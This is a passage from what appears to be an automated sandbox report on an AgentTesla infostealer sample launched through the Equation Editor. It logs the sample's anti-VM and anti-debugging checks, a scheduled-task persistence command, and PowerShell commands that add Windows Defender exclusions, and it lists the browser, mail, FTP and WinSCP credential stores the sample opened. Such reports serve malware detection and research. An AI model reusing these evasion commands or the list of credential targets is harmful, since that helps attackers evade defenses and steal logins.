                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 59383Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 40611Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 38635Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 61358Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 40064
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 99938
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 99984
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 99968
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 99969
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 99891
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 99906
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 79928
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 80063
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 79985
                    Source: dzoihohj75439.scr, 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: dzoihohj75439.scr, 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 13_2_001C5348 CheckRemoteDebuggerPresent,13_2_001C5348
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory written: C:\Users\user\AppData\Roaming\dzoihohj75439.scr base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory written: C:\Users\user\AppData\Roaming\egFUHsL.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\egFUHsL.exe C:\Users\user\AppData\Roaming\egFUHsL.exe
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp9A3D.tmp"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Users\user\AppData\Roaming\egFUHsL.exe "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrQueries volume information: C:\Users\user\AppData\Roaming\dzoihohj75439.scr VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrQueries volume information: C:\Users\user\AppData\Roaming\dzoihohj75439.scr VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeQueries volume information: C:\Users\user\AppData\Roaming\egFUHsL.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeQueries volume information: C:\Users\user\AppData\Roaming\egFUHsL.exe VolumeInformation
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.3419a00.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.33de1e0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.dzoihohj75439.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.33de1e0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.3419a00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dzoihohj75439.scr PID: 3456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: dzoihohj75439.scr PID: 3788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: egFUHsL.exe PID: 312, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.3419a00.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.33de1e0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.dzoihohj75439.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.33de1e0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.3419a00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dzoihohj75439.scr PID: 3456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: dzoihohj75439.scr PID: 3788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: egFUHsL.exe PID: 312, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.3419a00.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.33de1e0.7.unpack, type: UNPACKEDPE
